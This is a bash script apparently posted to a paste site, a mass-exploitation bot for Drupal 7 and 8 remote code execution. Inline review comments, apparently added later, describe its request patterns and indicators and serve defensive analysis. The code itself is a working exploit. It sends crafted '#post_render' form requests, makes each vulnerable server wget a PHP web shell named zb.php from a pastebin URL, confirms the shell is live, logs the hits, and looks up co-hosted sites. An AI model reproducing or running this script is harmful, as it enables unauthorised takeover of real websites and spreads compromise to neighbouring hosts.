zerobyte-id

Exploiter CMS Drupal RCE

May 3rd, 2018
  1. #!/bin/bash
  2. # AutoExploit [BOT]
  3. # Remote Code Execute CMS Drupal 7.x - 8 + Reverse IP
  4. # Date : 22 - Apr - 2018
  5. # Usage : ./rce.sh list.txt
  6. # Coded by ZeroByte.ID
  # Browser-like User-Agent (Firefox 59 on Ubuntu) that drupal7() hands to curl with -A.
  # The curl calls in drupal8() and reverse() pass no -A option, so only the Drupal 7
  # requests carry this string. It copies an ordinary browser, so it is not a useful
  # detection signal on its own; the request parameters are.
  7. useragent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0";
  # reverse <target>
  # Reverse-IP lookup helper. Resolves its argument with `dig +short`, asks the
  # api.hackertarget.com reverseiplookup endpoint which hostnames share that address,
  # and appends the sorted, de-duplicated names to domains.tmp in the working directory.
  # Its only callers in this listing are upload-success branches of drupal7() and
  # drupal8(); nothing shown here reads domains.tmp back.
  # Returns 1 when the API answers 'No records found' or 'error check'. On
  # 'API count exceeded' it sleeps 10 minutes and then calls `exit`, which ends the whole run.
  # NOTE(review): on shared hosting this means one vulnerable site gives the operator the
  # names of the other sites on the same IP address, so incident scoping should cover
  # co-hosted sites and not only the host that was written to.
  8. reverse() {
  9.   target=$1
        # resolve the argument with dig; the answer is used as the lookup key below
  10.   getip=$(dig +short $1);
        # first API query; the reply text is only pattern-matched in the branches below
  11.   check=$(curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip});
  12.    if [[ $check =~ 'No records found' ]]; then
  13.       echo "[BAD] $getip";
  14.       return 1
  15.    elif [[ $check =~ 'error check' ]]; then
  16.       echo "[BAD] $getip";
  17.       return 1
  18.    elif [[ $check =~ 'API count exceeded' ]]; then
            # rate-limit reply: the Indonesian status lines say the bot needs a short rest,
            # must not be stopped, and is on a break of roughly 10 minutes
  19.       echo "[WAITING]"
  20.       echo "ROBOT BUTUH ISTIRAHAT BENTARAN!";
  21.       echo "[JANGAN DI STOP!]";
  22.       echo "GUA LAGI NGOPI KURANG LEBIH 10 Menit";
  23.       sleep 10m;
  24.       exit
  25.    else
            # second API query for the same address; the raw reply is appended to domain.tmp
  26.       curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip} >> domain.tmp
  27.       sleep 0.5s
            # line count of the reply, reported as the number of sites
  28.       list=$(cat domain.tmp | wc -l);
            # remove every 'www.' and 'mail.' match, then sort and de-duplicate into domains.tmp
  29.       cat domain.tmp | sed 's|www.||g' | sed 's|mail.||g' >> domains2.tmp
  30.       sort domains2.tmp | uniq >> domains.tmp
  31.       echo "[OK] $getip and $list site";
  32.       sleep 0.6s
            # only the two scratch files are removed; domains.tmp stays on disk
  33.       rm domain.tmp
  34.       rm domains2.tmp
  35.     fi
  36. }
  # drupal7 <target>
  # Probes <target> for the flaw the file header calls "Remote Code Execute CMS Drupal 7.x - 8"
  # and, when the probe answers, tries to place a PHP file on the host. Falls through to
  # drupal8() whenever the Drupal 7 probe does not match.
  # Request pattern visible below (all curl, 10 s timeout, session cookies in cookie.tmp):
  #   a. POST /?q=user/password with name[#post_render][], name[#type] and name[#markup]
  #      in the query string ('#' sent as %23) and body form_id=user_pass&_triggering_element_name=name
  #   b. POST /?q=file/ajax/name/%23value/<form_build_id> with body form_build_id=<same value>
  # Indicators that appear in this block: the two request shapes above, a file named zb.php
  # in the web root or in sites/default/files, a server-side fetch of
  # https://pastebin.com/raw/S1c9b4ne, and the marker string 'ZeroByte.ID' in the fetched file.
  # Local output files: result.txt (hits), gagal-upload.txt ("gagal" is Indonesian for "failed").
  # NOTE(review): besides patching Drupal core, the steps here rely on three things a defender
  # controls: '#'-prefixed parameter keys reaching the application, outbound HTTP from the
  # web server, and the web root / sites/default/files being writable by the PHP process
  # and serving the dropped file. Confirm each against your deployment.
  37. drupal7() {
  38.     target=$1
  39.     echo -ne "---";
          # request (a) with the harmless command `uname -a`; only checks that a form_build_id comes back
  40.     cek7=$(curl -s -m 10 -X POST -A ${useragent} --cookie-jar cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id);
  41.     echo -ne "-------";
  42.     sleep 2s
  43.     if [[ $cek7 =~ 'value="form-' ]]; then
  44.         echo -ne "--------------------------";
              # request (a) again, this time extracting the form_build_id value from the reply
  45.         token=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  46.         echo -ne "----------------------------------";
  47.         echo
  48.         sleep 2s
              # request (b); the first line of the reply is kept as the probe result
  49.         result=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${token}" --data "form_build_id=${token}" | head -1)
              # the host is reported as vulnerable when that line contains 'Linux' (uname output)
  50.         if [[ $result =~ 'Linux' ]]; then
  51.           echo "[O] VULN RCE $target : uname -a"
  52.           echo "$result";
                # status text is Indonesian for "uploading shell"
  53.           echo "Proses Upload Shell ....."
  54.           sleep 2s
                # drop attempt 1: same (a)+(b) pair, with a wget of the pastebin URL naming zb.php in the web root
  55.           uploadhome=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  56.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploadhome}" --data "form_build_id=${uploadhome}" | head -1 > /dev/null
  57.           sleep 5s
                # verification: plain GET of /zb.php, looking for the 'ZeroByte.ID' marker
  58.           cekshellhome=$(curl -s -m 10 "${target}/zb.php");
  59.           if [[ $cekshellhome =~ 'ZeroByte.ID' ]]; then
  60.             echo "[HOME] Upload Done"
  61.             echo "$result" >> result.txt
  62.             echo "$target/zb.php" | tee -a result.txt
  63.           else
  64.             echo "[HOME] Can't Upload"
  65.           fi
  66.           sleep 2s
                # drop attempt 2: same pair, naming sites/default/files/zb.php
  67.           uploaddir=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+sites/default/files/zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  68.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploaddir}" --data "form_build_id=${uploaddir}" | head -1 > /dev/null
  69.           sleep 5s
                # verification: GET of /sites/default/files/zb.php, same marker check
  70.           cekshell=$(curl -s -m 10 "${target}/sites/default/files/zb.php");
  71.           if [[ $cekshell =~ 'ZeroByte.ID' ]]; then
  72.             echo "[DIR WRITABLE] Upload Done"
  73.             echo "$result" >> result.txt
  74.             echo "$target/sites/default/files/zb.php" | tee -a result.txt
  75.             echo "=====================================" >> result.txt
                  # only this success branch goes on to enumerate co-hosted sites
  76.             reverse $target
  77.           else
  78.             echo "[DIR WRITABLE] Can't Upload"
  79.             echo "$target" >> gagal-upload.txt
  80.           fi
  81.           echo "--------------------------------------------------------------------------"
  82.         else
                # probe reply did not contain 'Linux': try the Drupal 8 path
  83.             echo "[X] NOT VULN $target"
  84.             drupal8 $target
  85.         fi
  86.     else
            # no form_build_id in the first reply: try the Drupal 8 path
  87.         echo
  88.         echo "[X] NOT VULN $target";
  89.         drupal8 $target
  90.        
  91.     fi
  92. }
  # drupal8 <target>
  # Drupal 8 fallback, called from drupal7() when the Drupal 7 probe does not match.
  # Sends two POSTs (curl --data, TLS certificate checks disabled with -k, no -A option) to
  #   /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
  # with mail[a][#post_render][], mail[a][#type] and mail[a][#markup] in the body. Each
  # carries a wget of https://pastebin.com/raw/S1c9b4ne, first to zb.php in the web root,
  # then to sites/default/files/zb.php. There is no separate harmless probe on this path:
  # the first request already attempts the write.
  # Success is judged by 'ZeroByte.ID' appearing in the POST response itself; the dropped
  # path is not fetched afterwards as it is in drupal7().
  # Indicators in this block: the /user/register query string above, '#post_render' inside
  # POST body keys, zb.php at either path, and the pastebin fetch from the server.
  # Local output files: result.txt (hits), not-vuln.txt.
  # NOTE(review): in the else branch a match on the second request prints "Upload Done" and
  # logs the URL to result.txt, but control still reaches the "NOT VULN" message and the
  # not-vuln.txt append. A host listed in not-vuln.txt is therefore not proof that nothing was written.
  93. drupal8() {
  94.   target=$1
  95.   echo "[O] CHECKING DRUPAL 8";
  96.   echo -ne "---";
        # write attempt into the web root
  97.   cek8=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O zb.php")
        # write attempt into sites/default/files; sent regardless of the first result
  98.   cek8_=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O sites/default/files/zb.php")
  99.   echo -ne "-------------------";
  100.   if [[ $cek8 =~ 'ZeroByte.ID' ]]; then
  101.     echo -ne "-------------------------------------------";
  102.     echo "[O] Upload Done"
  103.     echo "$target/zb.php" | tee -a result.txt
          # success at the web root also triggers the co-hosted site lookup
  104.     reverse $target
  105.   else
  106.     if [[ $cek8_ =~ 'ZeroByte.ID' ]]; then
  107.       echo -ne "-------------------------------------------";
  108.       echo "[O] Upload Done"
  109.       echo "$target/sites/default/files/zb.php" | tee -a result.txt
  110.     fi
          # reached whether or not the inner check matched
  111.     echo
  112.     echo "[X] NOT VULN $target !"
  113.     echo -ne "-------------------------------------------------";
  114.     echo "$target" >> not-vuln.txt
  115.     echo
  116.   fi
  117. }
  118.  
  # Entry point: prints the banner, then passes every whitespace-separated entry of the
  # file named by $1 to drupal7(). Nothing in this listing fingerprints a host first, so
  # the probe requests reach every listed site whether or not it runs Drupal, and the same
  # request pattern can show up in the logs of unrelated sites.
  119. cat << "banner"
  120. --------------------------------------------------
  121.                    _           _         _     _
  122.  _______ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  123. |_  / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  124.  / /  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  125. /___\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  126.                          |___/                  
  127.                                             kUr4x        
  128. ----------------[ RCE Drupal ]--------------------
  129.  
  130. banner
  131.  
  # one drupal7() call per word of the target list; targets are handled sequentially,
  # with the fixed sleeps inside the functions pacing the requests
  132. for s in $(cat $1); do
  133.     echo "CHECKING DRUPAL 7 $s"
  134.     echo -ne "----";
  135.     drupal7 $s
  136. done
  # only the cookie jar is removed; result.txt, not-vuln.txt, gagal-upload.txt and
  # domains.tmp are appended to during the run and left in the working directory
  137. rm cookie.tmp